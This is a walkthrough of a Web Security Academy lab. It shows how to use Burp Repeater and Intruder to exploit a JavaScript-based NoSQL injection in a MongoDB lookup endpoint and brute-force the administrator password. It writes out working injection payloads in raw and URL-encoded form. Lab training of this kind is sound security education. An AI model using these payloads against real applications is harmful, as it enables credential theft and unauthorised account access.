Lab: Exploiting NoSQL injection to extract data
Intro
The difficulty level of this exercise is PRACTITIONER and the goal is to log into the application as an administrator. The database backend is MongoDB.
To solve this exercise, we need Burp Suite, either Community or Professional Edition.
Walkthrough
After starting the exercise, the shop should look like the screenshot. However, the products in the shop may be different, as the Web Security Academy exercises are regenerated again and again. It is important to note that this has no influence on the solution.
At the top left, there is a link called “My account”.
Click on it and log in with the user name "wiener" and the password "peter".
After logging in, you should be able to access the account.
We now switch to the Burp Suite and open the Burp Proxy there. In Burp Proxy, we open the "HTTP history" tab and search for the GET request to the endpoint /user/lookup?user=wiener.
The HTTP history shows all requests that have been run through the Burp Proxy so far. We now want to send the request to the Burp Repeater. To do this, we move the mouse over the request and right-click. A context menu appears, in which we select the option “Send to Repeater”.
Now we open the Burp Repeater and take a closer look at the request. The most interesting part for us is the first line of the request. Here we insert a single apostrophe (') at the end of the user name "wiener". The request line should now look like this:
GET /user/lookup?user=wiener' HTTP/2When this request is sent, we receive an HTTP/2 200 OK response, with the following error message:
There was an error getting user details
Based on this error message, we now know that the user input was not filtered or cleaned correctly. We now insert a valid JavaScript payload to test whether this also has an effect on the response. To do this, we insert the plus sign and end the expression with another single apostrophe. The request should now look like this:
GET /user/lookup?user=wiener'+' HTTP/2Before we can send this request, we first have to URL-encode it. To do this, select '+' and press CTRL+U in the Burp Repeater.
GET /user/lookup?user=wiener'%2b' HTTP/2Now the request can be sent and you will receive an HTTP/2 200 OK.
We now want to test whether the answer can also be influenced by inserting Boolean conditions. To do this, we insert a condition that is evaluated as false. The first line of the query then looks like this:
GET /user/lookup?user=wiener' && '1'=='2 HTTP/2The printout must also be URL-encoded again with CTRL+U.
GET /user/lookup?user=wiener'+%26%26+'1'%3d%3d'2 HTTP/2In response we receive the message:
Could not find user
Now we want to send a condition that is evaluated as true. To do this, we change our expression wiener' && '1'=='2 to wiener' && '1'=='1. After we have coded the URL with the key combination CTRL+U, our first line of the request looks like this:
GET /user/lookup?user=wiener'+%26%26+'1'%3d%3d'1 HTTP/2When we send this request, we receive an HTTP/2 200 OK response with the data of the user "wiener".
This shows us that we can trigger different reactions for true and false conditions. Now we want to find out the length of the administrator password. To do this, we change the value of the user parameter as follows:
administrator' && this.password.length < 30 || 'a'=='bThis expression is used to test whether the administrator password is shorter than 30 characters. Before the request is sent, it must be URL-encoded with CTRL+U. The first line of the request then looks like this:
GET /user/lookup?user=administrator'+%26%26+this.password.length+<+30+||+'a'%3d%3d'b HTTP/2In response, we receive an HTTP/2 200 OK with the administrator's information. This means that the condition is fulfilled as the password is less than 30 characters long.
We can now try out different password lengths. If we enter a password length of 8, we receive the message:
Could not find userFrom this it can be concluded that the administrator password is 8 characters long.
This request is now sent to the Burp Intruder. To do this, move the mouse over the request and click the right mouse button. A context menu appears in which you select "Send to Intruder".
We now switch to the Burp Intruder and adjust our request. The value of the user parameter should now look like this:
administrator' && this.password[0]=='aFirst, we select „Cluster bomb attack“ from the drop-down menu.
Now we need to define which parameters are to be changed. To do this, we select the 0 in this.password[0] and click on the „Add §“ button.
We do the same with the a in this.password[0]=='a. The first line of the request should now look like this:
GET /user/lookup?user=administrator' && this.password[§0§]=='§a§ HTTP/2In the Payloads section, we can now adjust the two values we have just defined. Payload 1 is the 0 and Payload 2 is the a. For Payload 1, the Payload position should be 1.
„Numbers“ must be selected in the Payload type drop-down field.
In the Payload configuration section, a „0“ must be entered under From and a „7“ under To. The rest remains unchanged.
For Payload 2, the value "2" must be entered under Payload position. „Simple list“ must be entered in the Payload type drop-down list (this is the default setting). For Payload configuration, we now add the lower case letters from a-z. A predefined list can be used here for Burp Professional.
Before the request can be sent, we have to URL-encode our expression with CTRL+U. The first line of the request now looks like this:
GET /user/lookup?user=administrator'+%26%26+this.password[§0§]%3d%3d'§a§ HTTP/2Now click on the "Start attack" button. In the Community Edition of Burp Suite, this attack may take a little longer, as there are speed restrictions for the Burp Intruder.
After completing the attack, we sort our result by clicking on „Payload 1“ and then double-clicking on „Length“.
The password here is grgyyjpw. We now log in to the application with the user administrator and the password grgyyjpw.
Video solution
Last updated